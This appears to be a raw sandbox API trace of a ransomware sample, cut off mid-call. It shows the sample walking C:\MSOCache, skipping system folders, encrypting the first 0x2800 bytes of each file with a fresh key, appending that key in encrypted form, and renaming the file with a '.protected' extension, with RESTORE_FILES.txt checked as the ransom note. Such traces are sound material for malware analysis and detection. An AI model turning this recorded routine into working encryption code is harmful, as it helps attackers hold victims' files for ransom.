1 [0044.750] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0044.750] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\*") returned 17 [0044.750] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x447b60 [0044.750] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.750] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.750] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.750] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.750] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.750] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\.") returned 17 [0044.750] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.750] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0044.750] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0044.750] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.751] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.751] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\." (normalized: "c:\\msocache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.751] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.751] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.751] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.751] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.751] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.751] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.751] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\..") returned 18 [0044.751] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.751] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.751] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0044.751] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0044.751] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.751] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.751] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.751] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.751] lstrcmpiW (lpString1="All Users", lpString2="Windows") returned -1 [0044.751] lstrcmpiW (lpString1="All Users", lpString2="Program Files") returned -1 [0044.751] lstrcmpiW (lpString1="All Users", lpString2="Program Files (x86)") returned -1 [0044.751] lstrcmpiW (lpString1="All Users", lpString2="$Recycle.bin") returned 1 [0044.751] lstrcmpiW (lpString1="All Users", lpString2="System Volume Information") returned -1 [0044.751] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users") returned 25 [0044.751] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0044.751] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0044.752] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\*") returned 27 [0044.752] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.886] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.886] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.886] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.886] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.886] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.886] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\.") returned 27 [0044.886] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.886] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0044.886] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0044.886] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.886] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.886] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\." (normalized: "c:\\msocache\\all users\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.886] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0045.018] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0045.018] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0045.018] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0045.018] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0045.018] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0045.018] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\..") returned 28 [0045.018] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0045.018] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.018] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0045.018] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0045.018] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0045.018] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0045.018] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\.." (normalized: "c:\\msocache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.018] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0045.018] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0045.018] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0045.018] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0045.018] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0045.018] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0045.018] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned 66 [0045.018] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0045.018] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0045.019] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*") returned 68 [0045.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0045.025] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0045.025] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0045.025] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0045.025] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0045.025] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0045.025] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.") returned 68 [0045.025] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.025] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0045.025] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0045.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0045.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0045.025] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.025] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0045.025] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0045.025] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0045.025] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0045.025] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0045.025] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0045.025] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\..") returned 69 [0045.025] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0045.025] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.025] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0045.025] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0045.026] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0045.026] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0045.026] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.026] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0045.026] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="Windows") returned -1 [0045.026] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="Program Files") returned -1 [0045.026] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="Program Files (x86)") returned -1 [0045.026] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="$Recycle.bin") returned 1 [0045.026] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="System Volume Information") returned -1 [0045.026] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0045.026] StrStrIW (lpFirst="ExcelLR.cab", lpSrch=".protected") returned 0x0 [0045.026] lstrcmpW (lpString1="ExcelLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0045.026] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0045.026] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0045.026] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0045.029] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0045.029] StrStrW (lpFirst="ExcelLR.cab", lpSrch=".txt") returned 0x0 [0045.029] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0045.029] StrStrW (lpFirst="ExcelLR.cab", lpSrch=".rar") returned 0x0 [0045.029] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0045.029] StrStrW (lpFirst="ExcelLR.cab", lpSrch=".zip") returned 0x0 [0045.029] ReadFile (in: hFile=0xb4, lpBuffer=0x48cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48cc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0045.143] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.143] WriteFile (in: hFile=0xb4, lpBuffer=0x48cc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48cc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0045.143] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.143] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0045.410] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0045.410] CloseHandle (hObject=0xb4) returned 1 [0046.421] wnsprintfW (in: pszDest=0x495c60, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.protected") returned 88 [0046.421] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.protected")) returned 1 [0047.306] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0047.306] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="Windows") returned -1 [0047.306] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="Program Files") returned -1 [0047.306] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="Program Files (x86)") returned -1 [0047.306] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="$Recycle.bin") returned 1 [0047.306] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="System Volume Information") returned -1 [0047.306] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0047.306] StrStrIW (lpFirst="ExcelMUI.msi", lpSrch=".protected") returned 0x0 [0047.306] lstrcmpW (lpString1="ExcelMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0047.306] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0047.306] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0047.306] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0047.306] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0047.306] StrStrW (lpFirst="ExcelMUI.msi", lpSrch=".txt") returned 0x0 [0047.306] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0047.306] StrStrW (lpFirst="ExcelMUI.msi", lpSrch=".rar") returned 0x0 [0047.306] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0047.306] StrStrW (lpFirst="ExcelMUI.msi", lpSrch=".zip") returned 0x0 [0047.307] ReadFile (in: hFile=0xb4, lpBuffer=0x4a8878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a8878*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0047.479] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.479] WriteFile (in: hFile=0xb4, lpBuffer=0x4a8878*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a8878*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0047.480] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.480] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0047.599] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0047.599] CloseHandle (hObject=0xb4) returned 1 [0047.843] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.protected") returned 89 [0047.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.protected")) returned 1 [0047.843] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0047.843] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="Windows") returned -1 [0047.843] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="Program Files") returned -1 [0047.843] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="Program Files (x86)") returned -1 [0047.843] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="$Recycle.bin") returned 1 [0047.843] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="System Volume Information") returned -1 [0047.843] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0047.843] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch=".protected") returned 0x0 [0047.843] lstrcmpW (lpString1="ExcelMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0047.843] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0047.843] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0047.843] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0047.844] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0047.844] StrStrW (lpFirst="ExcelMUI.xml", lpSrch=".txt") returned 0x0 [0047.844] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0047.844] StrStrW (lpFirst="ExcelMUI.xml", lpSrch=".rar") returned 0x0 [0047.844] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0047.844] StrStrW (lpFirst="ExcelMUI.xml", lpSrch=".zip") returned 0x0 [0047.844] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x61d, lpOverlapped=0x0) returned 1 [0047.886] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff9e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.886] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x61d, lpOverlapped=0x0) returned 1 [0047.886] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.886] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0047.886] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0047.886] CloseHandle (hObject=0xb4) returned 1 [0047.887] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.protected") returned 89 [0047.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.protected")) returned 1 [0047.888] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0047.888] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0047.888] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0047.888] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0047.888] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0047.888] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0047.888] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0047.888] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0047.888] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0047.888] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0047.888] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0047.888] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all 